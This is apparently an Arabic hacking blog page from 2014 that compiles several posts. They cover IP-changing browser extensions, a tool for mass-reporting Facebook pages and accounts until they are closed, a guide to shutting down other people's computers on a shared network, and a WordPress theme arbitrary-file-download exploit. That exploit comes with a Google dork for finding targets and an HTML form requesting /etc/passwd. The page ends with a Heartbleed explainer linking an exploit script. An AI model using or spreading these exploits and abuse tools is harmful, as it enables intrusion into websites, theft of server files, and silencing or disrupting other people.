جديد اليوم !
جااري تحميل اخي يرجي الانتظار......
اعلن معانا في الموقع

تغيير اي بي المتصفح | فتح حظر المواقع المحجوبة | بسهولة


تغيير اي بي المتصفح | فتح حظر المواقع المحجوبة

السلام عليكم ورحمة الله وبركاته
7 اضافات لمتصفح [ Google Chrome ]
لتغيير اي بي المتصفح
وفك حظر المواقع المحجوبة
تستطيع إختيار اي اضافة تناسبك

الاضافة الاولى

الاضافة الثانية

الاضافة الثالثة

الاضافة الرابعة

الاضافة الخامسة

الاضافة السادسة

الاضافة السابعة

اقوى برنامج لاغلاق صفحات الفيس بوك

السلام عليكم ورحمة الله وبركاته


اليوم انشاء الله معنا برنامج لاغلاق صفحات الفيس بوك تم تصميمم البرنامج من قبل OS Viurs احد اعضاء منظمة Anonymous Egypt

البرنامج يقوم بعمل ريبورتات على الصفحات بسررعة كبيرة مما يؤدى الى اغلاقها بسررعة 

صورة من البرنامج


ويمكن ايضا استخدام البرنامج على حسابات الفيس بوك  حسابات و صفحات

الان ناتى لتحميل البرنامج

فقط قم بالضغعط  هنا

باسورد البرنامج هو

الباسورد Os Virus

لا ترحل دون ان تضع بصمتك كلمة شكرا تكفى ..

أغلاق حاسوب أي شخص متصل معك بالشبكة بدون برامج

السلام عليكم ورحمة الله وبركاته


الان يمكنك إغلاق حاسوب أي شخص تريده على شبكتك فقط بالحصول على الأيبي الخاص بالحاسوب ، و فتح موجه الأوامر cmd في الوندوز لتطبيق بعض الأوامر التي تسمح لك بإضافة الحاسوب الذي تريده قصد إطفاءه في وقت زمني أنت تختاره ، مع إظافة رسالة ستظهر في الوقت الذي سوف يتم فيه إقفال هذا الحاسوب ، وتنفع هذه الطريقة أيضا في حالة ما رغبت أنت أيضا في إغلاق حاسوبك في مدة أنت تحددها.


وقصد الحصول على الأيبيهات للأشخاص المتصلين على شبكتك دون الحاجة إلى التعب قصد البحث عنه في الحاسوب المراد استهذافه ، سأضع لك برنامج WNetWatcher الذي يقوم بفحص للشبكة للحصول على الأيبيهات ، وهنا وجب التذكير أن هذا البرنامج سينفعك أيضا في حال ما رغبت بمعرفة إذا كان أي شخص ما قد اخترق شبكتك ويتصل بها.





رابط تحميل برنامج


لا ترحل دون ان تضع بصمتك,, كلمة شكرا تكفى :)

لا ترحل دون ان تضع بصمتك,, كلمة شكرا تكفى 

شرح استغلال ثغرة File Download Vulnerability فى مواقع الورد بريس ثغرة جديدة






############################################################################
  
# Title : Wordpress Theme Elegance Arbitrary File Download Vulnerability  
  
# Author : Aloulou                                            
  
# Date : 19/06/2014                                                   
  
    
# Vendor : www.wordpress.org                                                    
  
# Google Dork : inurl:/wp-content/themes/elegance
  
# Tested on : Linux
                         
  
  
############################################################################
  
  
Exploit:
  
<html>
<body>
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>


تم نشر الثغرة بالتفصيل اتمنى ان يكون الجميع قد فهم الثغرة
ملاحظة : الثغرة موجودة فى موقع الثغرت المعروف (1337day)

وتم شرحها هنا بالتفصيل


لا ترحل دون ان تضع بصمتك كلمة شكرا تكفى


ناتى الان الى شرح لاستغلال الثغرة


مشاهدة طيبة








حصريا : شرح استغلال ثغرة Heartbleed وطريقة اشتغالها

السلام عليكم احبابى فى الله ,, وزوار موقعنا الكرام

اليوم شرح جديد لثغرة Heartbleed ,, وكيفية اتغلال ثغرة Heartbleed
شرح عن الثغرة :

في الأسبوع الأول من شهر أبريل لهذا العام
أهتزت كل المجتمعات التقنية و المهتمة بأمن المعلومات لوجود ثغرة تسمى Heartbleed

ثغرة Heartbleed هي ضعف خطير في OpenSSL ،، و OpenSSL هي مكتبة برامج التشفير المعروفة.

هذه الثغرة تتيح سرقة المعلومات المشفرة في ظل ظروف طبيعية، من خلال التشفير SSL / TLS المستخدم لتأمين الإنترنت.
يوفر SSL / TLS الأمن و الخصوصية في اﻻتصالات عبر الإنترنت مثل اﻻتصال بالإنترنت والبريد الإلكتروني، والرسائل الفورية (IM) وبعض الشبكات الافتراضية (VPNs).
ثغرة Heartbleed تسمح لأي شخص على الإنترنت لقراءة الذاكرة/Ram للأنظمة التي تستخدم الإصدارات الضعيفة من OpenSSL. هذا الوضع ينال من المفاتيح السرية المستخدمة للتعرف على مقدمي الخدمة ولتشفير حركة المرور، وأسماء وكلمات المرور للمستخدمين والمحتوى الفعلي.
وهذا يسمح للمهاجمين للتنصت على الاتصالات، وسرقة البيانات مباشرة من الخدمات والمستخدمين و إنتحال الخدمات والمستخدمين في النظام.
HeartBleed 1 1024x535 كل ما تود معرفته عن ثغرة Heartbleed

فيما تضع المستضيفون العرب معيار الأمن في الاعتبار.لذلك تم تحديث جميع الخدمات التى تستخدم بروتوكول SSL / TLS بشكل فورى بجميع خوادمها وخوادم العملاء بالاضافة الى خوادم الاستضافة المشتركة والسحابية, اذا كنت تستخدم احدى خدمات المستضيفون العرب فأنت خارج التهديد الأن من هذه الثغرة .


ما الذي تم تسريبه عند تجربة الثغرة Heartbleed ؟

اختبرنا ثغرة Heartbleed بعض الخدمات الخاصة بنا من وجهة نظر المهاجم. هاجمنا أنفسنا من الخارج، دون أن تترك أي أثر. دون استخدام أي معلومات سرية أو وثائق التفويض.
تمكنا من سرقة المفاتيح السرية الخاصة بنا المستخدمة للحصول على شهادات X.509 و أسماء المستخدمين و كلمات المرور و الرسائل الفورية و رسائل البريد الإلكتروني و الوثائق الهامة الأعمال و الاتصالات الخاصة بنا.

كيف أوقف هذا التسريب ؟

طالما أن النسخة الضعيفة من OpenSSL قيد الاستخدام ويمكن أن يتم استغلالها.
لقد تم الافراج عن نسخة لمستقرة و أمنة من OpenSSL والآن لا بد من نشرها و التحديث إليها لكلا من : أنظمة التشغيل و الأجهزة والبرامج المستقلة والأجهزة الشبكية والبرمجيات التي يستخدمونها.

أسلئلة و أجوبة عن ثغرة Heartbleed :

ماهو CVE-2014-0160 ؟
CVE-2014-0160 هو المرجع الرسمي لهذا الخطأ.

(CVE : Common Vulnerabilities and Exposures) هو معيار للأسماء وجود ثغرة في أمن المعلومات و التي تحتفظ بها MITRE.

لماذا يطلق عليها ثغرة Heartbleed؟

الثغرة تتبع OpenSSL في تنفيذ “transport layer security protocols” المعروف بـ TLS/DTLS. عندما يتم استغلالها أنه يؤدي إلى تسرب محتويات الذاكرة/Ram من الخادم إلى العميل ومن العميل إلى الخادم.

لماذا Heartbleed هي الفريدة من نوعها ؟

الخلل في برنامج واحد OpenSSL يتم إصلاحها من خلال الإصدارات الجديدة. ولكن هذا الخطأ قد ترك كمية كبيرة من المفاتيح الخاصة وأسرارالآخرين المعرضين للتسريب على لشبكة الإنترنت. بالإضافة لسهولة الاستغلال دون ترك أي أثر لذلك تؤخذ على محمل الجد.

هل هذا عيب تصميم في بروتوكول SSL / TLS ؟

لا.. هذه مشكلة/خطأ في البرمجة مكتبة OpenSSL , التي تقدم خدمات التشفير مثل SSL / TLS إلى التطبيقات والخدمات علي اﻻنترنت.
heart bleed كل ما تود معرفته عن ثغرة Heartbleed

ماهي إصدارات OpenSSL المصابة ؟

  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable

ماذا عن أنظمة التشغيل؟

بعض التوزيعات من انظمة التشغيل من المحتمل أن تكون عرضة نسخة OpenSSL المصابة :
  • Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
  • Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
  • CentOS 6.5, OpenSSL 1.0.1e-15
  • Fedora 18, OpenSSL 1.0.1e-4
  • OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
  • FreeBSD 10.0 – OpenSSL 1.0.1e 11 Feb 2013
  • NetBSD 5.0.2 (OpenSSL 1.0.1e)
  • OpenSUSE 12.2 (OpenSSL 1.0.1c)
توزيعات و ا نظمو التشغيل مع الإصدارات التي ليست عرضة للثغرة :
  • Debian Squeeze (oldstable), OpenSSL 0.9.8o-4squeeze14
  • SUSE Linux Enterprise Server
  • FreeBSD 8.4 – OpenSSL 0.9.8y 5 Feb 2013
  • FreeBSD 9.2 – OpenSSL 0.9.8y 5 Feb 2013
  • FreeBSD 10.0p1 – OpenSSL 1.0.1g (At 8 Apr 18:27:46 2014 UTC)
  • FreeBSD Ports – OpenSSL 1.0.1g (At 7 Apr 21:46:40 2014 UTC)

كيف يمكن ان تكون OpenSSL مستقرة و أمنة ؟

قام فريق عمل OpenSSl بإصدار نسخة جديدة مستقرة وغير مصابة version 1.0.1g
يمكنك التحديث إليها .. او التحديث لأخر نسخة ممكنة
Heart bleed website1 1024x633 كل ما تود معرفته عن ثغرة Heartbleed

كيف يمكنني التأكد من أن نظامي سليم ؟

يمكنك فحص موقعك او سيرفرك من الرابط التالي http://filippo.io/Heartbleed

من قام بإكتشاف الثغرة و الإبلاغ عنها لفريق OpenSSL ؟

قام إثنين بإكتشاف الثغرة وهم team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security
------------------------

وفى النهاية اترككم مع شرح لكيفية استغلال ثغرة Heartbleed

كل ما تحتاجونة فى الفيديو 
مشاهدة طيبة 



رابط تحميل مترجم البايثون

اضغط هنا

رابط موقع الفحص

اضغط هنا

رابط تحميل السكربيت المستخدم فى الشرح

اضغط هنا



جميع الحقوق محفوظة لمدونةSecurity Point2014